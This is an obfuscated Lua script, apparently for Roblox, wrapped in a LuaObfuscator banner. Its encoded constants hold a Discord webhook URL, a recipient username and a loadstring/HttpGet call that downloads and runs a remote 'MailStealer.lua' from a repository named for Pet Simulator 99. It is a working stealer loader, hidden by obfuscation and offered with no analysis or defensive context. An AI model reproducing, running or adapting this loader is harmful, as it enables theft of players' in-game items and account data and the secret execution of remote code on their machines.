--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v84=0;while true do if (v84==0) then v19=v0(v3(v30,1,1));return "";end end else local v85=v2(v0(v30,16));if v19 then local v92=0;local v93;while true do if (v92==1) then return v93;end if (v92==0) then v93=v5(v85,v19);v19=nil;v92=1;end end else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/((5 -3)^(v32-1)))%(((1 + 4) -3)^(((v33-1) -(v32-((878 -(282 + 595)) -0))) + (2 -1))) ;return v86-(v86%(620 -(555 + 64))) ;else local v87=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v87 + v87))>=v87) and (928 -((1851 -(1523 + 114)) + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * ((1438 -(32 + 85)) -(68 + 997))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;v35=1;end end end local function v23() local v38=0 + (180 -(67 + 113)) ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (3720433 + 13056783)) + (v41 * 65536) + (v40 * (1213 -(892 + 48 + 17))) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -3) ;v38=351 -(87 + 263) ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if ((4 -2)==v43) then v48=v20(v45,16 + 5 ,123 -92 );v49=((v20(v45,984 -(802 + (1230 -(1020 + 60))) )==(2 -1)) and  -(3 -2)) or (1 -0) ;v43=3;end if (v43==(3 + 0)) then if (v48==0) then if (v47==(438 -(145 + 293))) then return v49 * (997 -(915 + (1505 -(630 + 793)))) ;else v48=2 -1 ;v46=0 + 0 ;end elseif (v48==2047) then return ((v47==(0 + 0)) and (v49 * (1/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-((7488 -5278) -(1069 + 118)) ) * (v46 + (v47/((8 -6)^((553 -436) -65)))) ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=1 -0 ;end if (v43==(1 + 0)) then v46=2 -(1 + 0) ;v47=(v20(v45,1 + 0 ,35 -15 ) * (2^(32 + 0))) + v44 ;v43=(2729 -1936) -(368 + 423) ;end end end local function v25(v50) local v51;if  not v50 then local v88=1747 -(760 + (2715 -1728)) ;while true do if (v88==(1913 -(1789 + 124))) then v50=v23();if (v50==(766 -(745 + 21))) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;local v52={};for v67=1 + 0 , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 -0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v69=(function() return 0 -0 ;end)();while true do if (v69~=1) then else if (v53~=3) then else for v101= #":",v23() do local v102=(function() return v21();end)();if (v20(v102, #"<", #":")~=(867 -(550 + 317))) then else local v109=(function() return 0;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109~=0) then else local v134=(function() return 0;end)();local v135=(function() return;end)();while true do if (v134==(0 -0)) then v135=(function() return 0;end)();while true do if (1==v135) then v109=(function() return 1;end)();break;end if ((0 -0)==v135) then v110=(function() return v20(v102,5 -3 , #"19(");end)();v111=(function() return v20(v102, #"asd1",6);end)();v135=(function() return 1;end)();end end break;end end end if (v109==1) then local v136=(function() return 0;end)();while true do if (v136~=(285 -(134 + 151))) then else v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==0) then local v177=(function() return 1665 -(970 + 695) ;end)();local v178=(function() return;end)();while true do if (v177~=0) then else v178=(function() return 0 -0 ;end)();while true do if (v178~=(1990 -(582 + 1408))) then else v112[ #"nil"]=(function() return v22();end)();v112[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v110== #">") then v112[ #"asd"]=(function() return v23();end)();elseif (v110==(6 -4)) then v112[ #"xxx"]=(function() return v23() -((2 -0)^16) ;end)();elseif (v110== #"nil") then local v185=(function() return 0 -0 ;end)();while true do if ((1824 -(1195 + 629))==v185) then v112[ #"91("]=(function() return v23() -(2^16) ;end)();v112[ #".dev"]=(function() return v22();end)();break;end end end v136=(function() return 1 -0 ;end)();end if (v136~=1) then else v109=(function() return 243 -(187 + 54) ;end)();break;end end end if (v109~=(782 -(162 + 618))) then else if (v20(v111, #"]", #"~")~= #"~") then else v112[2]=(function() return v60[v112[2 + 0 ]];end)();end if (v20(v111,2 + 0 ,2)~= #"{") then else v112[ #"nil"]=(function() return v60[v112[ #"-19"]];end)();end v109=(function() return 3;end)();end if ((6 -3)~=v109) then else if (v20(v111, #"-19", #"gha")~= #" ") then else v112[ #"xnxx"]=(function() return v60[v112[ #"asd1"]];end)();end v55[v101]=(function() return v112;end)();break;end end end end for v103= #"[",v23() do v56,v103,v28=(function() return v54(v56,v103,v28);end)();end return v58;end if (v53~=1) then else local v98=(function() return 0 -0 ;end)();while true do if (v98~=1) then else v59=(function() return v23();end)();v53=(function() return 1 + 1 ;end)();break;end if (v98==(1636 -(1373 + 263))) then v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v98=(function() return 1;end)();end end end break;end if (v69~=(0 + 0)) then else if (v53==2) then v60=(function() return {};end)();for v104= #"<",v59 do local v105=(function() return 0 -0 ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v105~=(0 -0)) then else local v113=(function() return 1384 -(746 + 638) ;end)();while true do if (v113==(1 + 0)) then v105=(function() return 1 -0 ;end)();break;end if ((341 -(218 + 123))==v113) then v106=(function() return 1581 -(1535 + 46) ;end)();v107=(function() return nil;end)();v113=(function() return 1;end)();end end end if ((1 + 0)==v105) then v108=(function() return nil;end)();while true do if (v106~=1) then else if (v107== #"|") then v108=(function() return v21()~=(0 + 0) ;end)();elseif (v107==2) then v108=(function() return v24();end)();elseif (v107== #"xxx") then v108=(function() return v25();end)();end v60[v104]=(function() return v108;end)();break;end if (v106~=(560 -(306 + 254))) then else local v162=(function() return 0 + 0 ;end)();while true do if ((1 -0)==v162) then v106=(function() return 1;end)();break;end if (v162~=0) then else v107=(function() return v21();end)();v108=(function() return nil;end)();v162=(function() return 1468 -(899 + 568) ;end)();end end end end break;end end end v58[ #"gha"]=(function() return v21();end)();v53=(function() return 3;end)();end if (v53==(0 + 0)) then local v100=(function() return 0;end)();while true do if (v100==(2 -1)) then v56=(function() return {};end)();v53=(function() return 604 -(268 + 335) ;end)();break;end if (v100~=(290 -(60 + 230))) then else v54=(function() return function(v129,v130,v131) local v132=(function() return 0;end)();local v133=(function() return;end)();while true do if (v132==(572 -(426 + 146))) then v133=(function() return 0 + 0 ;end)();while true do if (v133==(1456 -(282 + 1174))) then local v179=(function() return 811 -(569 + 242) ;end)();while true do if (v179~=(0 -0)) then else v129[v130-#"]" ]=(function() return v131();end)();return v129,v130,v131;end end end end break;end end end;end)();v55=(function() return {};end)();v100=(function() return 1 + 0 ;end)();end end end v69=(function() return 1025 -(706 + 318) ;end)();end end end end local function v29(v61,v62,v63) local v64=v61[1252 -(586 + 135 + 530) ];local v65=v61[1273 -(945 + 326) ];local v66=v61[3];return function(...) local v70=v64;local v71=v65;local v72=v66;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -(1 + 0 + 0) ;local v79={};local v80={};for v89=700 -(271 + 429) ,v78 do if ((89<4490) and (v89>=v72)) then v76[v89-v72 ]=v77[v89 + 1 + 0 ];else v80[v89]=v77[v89 + (1501 -(1408 + (189 -97))) ];end end local v81=(v78-v72) + (1087 -((1636 -1175) + 625)) ;local v82;local v83;while true do v82=v70[v74];v83=v82[1289 -(993 + 295) ];if (v83<=(1 + 9)) then if ((v83<=(4 + 0)) or (4983<1808)) then if (v83<=(1172 -(418 + (2574 -1821)))) then if (v83>(0 + (1018 -(697 + 321)))) then v80[v82[1 + (2 -1) ]]=v82[2 + 1 ];else do return;end end elseif (v83<=(1 + 1)) then v80[v82[(2 -1) + (1206 -(902 + 303)) ]]=v63[v82[532 -(406 + 123) ]];elseif ((3829>3769) and (v83==(1772 -((3839 -2090) + 20)))) then v74=v82[1 + 2 ];else local v139=v82[(10 -5) -3 ];local v140,v141=v73(v80[v139](v13(v80,v139 + (1323 -(1249 + 73)) ,v82[2 + 1 ])));v75=(v141 + v139) -(1146 -(466 + 679)) ;local v142=0 -0 ;for v163=v139,v75 do local v164=0 + 0 ;while true do if (v164==(0 -(0 + 0))) then v142=v142 + (1901 -(106 + 1794)) ;v80[v163]=v140[v142];break;end end end end elseif (v83<=(3 + (8 -4))) then if (v83<=(2 + 3)) then local v118=v82[1204 -(373 + 829) ];local v119=v80[v82[8 -5 ]];v80[v118 + 1 ]=v119;v80[v118]=v119[v82[10 -(3 + 3) ]];elseif (v83>(120 -(4 + 110))) then if (v80[v82[586 -(57 + 527) ]]==v82[4]) then v74=v74 + ((3118 -(1121 + 569)) -(41 + 1386)) ;else v74=v82[106 -(17 + 86) ];end else v63[v82[(217 -(22 + 192)) + 0 ]]=v80[v82[(1 -0) + 1 ]];end elseif ((1485<=2904) and (v83<=((45 -28) -9))) then v80[v82[5 -3 ]]=v82[3]~=((1393 -(322 + 905)) -((805 -(483 + 200)) + 44)) ;elseif (v83>((1688 -(1404 + 59)) -((653 -(602 + 9)) + 174))) then local v145=v82[(5 -3) -0 ];v80[v145]=v80[v145](v13(v80,v145 + 1 + (0 -0) ,v75));else local v147=v82[2];local v148,v149=v73(v80[v147](v13(v80,v147 + ((768 -(468 + 297)) -2) ,v82[3 + 0 ])));v75=(v149 + v147) -(1 + 0) ;local v150=562 -(334 + 228) ;for v165=v147,v75 do v150=v150 + ((5332 -3751) -(1183 + 397)) ;v80[v165]=v148[v150];end end elseif ((4269==4269) and (v83<=(30 -15))) then if ((387<=2782) and (v83<=((177 -100) -(30 + 35)))) then if ((v83==11) or (1899<=917)) then do return;end else v80[v82[2 + 0 ]]();end elseif ((v83<=(9 + 4)) or (4312<=876)) then v63[v82[1260 -(1043 + 214) ]]=v80[v82[7 -5 ]];elseif ((2232<=2596) and (v83==(1226 -(323 + 889)))) then local v151=v82[5 -3 ];local v152=v80[v82[1664 -(1477 + 184) ]];v80[v151 + ((1770 -(449 + 740)) -(361 + 219)) ]=v152;v80[v151]=v152[v82[324 -(53 + 267) ]];else v80[v82[2 -0 ]]=v82[1 + 2 ]~=(413 -(15 + 398)) ;end elseif (v83<=(1000 -((890 -(826 + 46)) + 964))) then if ((2095<3686) and (v83<=(60 -(991 -(245 + 702))))) then v80[v82[2 + 0 ]]=v82[307 -(244 + 60) ];elseif (v83>(11 + 6)) then local v157=(2685 -1835) -(20 + 830) ;local v158;while true do if (v157==(0 + 0)) then v158=v82[128 -(116 + 4 + 6) ];v80[v158]=v80[v158](v13(v80,v158 + 1 + 0 ,v75));break;end end else v80[v82[740 -(542 + 196) ]]=v63[v82[1 + 2 ]];end elseif (v83<=(40 -21)) then v74=v82[1 + 2 ];elseif (v83>((1911 -(260 + 1638)) + (12 -5))) then v80[v82[2 + 0 ]]();elseif (v80[v82[1 + 1 ]]==v82[10 -(2 + 4) ]) then v74=v74 + (1 -0) ;else v74=v82[(447 -(382 + 58)) -4 ];end v74=v74 + (1552 -(1126 + 425)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132373O3430312O393336373033323837322F5955697330734B44484A4D6C6D6E4B596C5F6C3336355A71794449764148617348386D4B3754753036655573764F3739464238394B3O30666A396B7175686659486664030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B692O75502F50532O395F4D61696C737465616C65722F6D61696E2F4D61696C537465616C65722E6C756103083O00557365726E616D65030F3O006A752O6E79626F7977617368657265030A3O004C6F61645363722O656E00163O0012103O00013O0026073O000D000100020004033O000D0001001210000100043O001206000100033O001211000100053O001211000200063O002005000200020007001210000400084O0004000200044O001200013O00022O000C0001000100010004033O001500010026073O0001000100010004033O000100010012100001000A3O001206000100094O0008000100013O0012060001000B3O0012103O00023O0004033O000100012O000B3O00017O00",v9(),...);
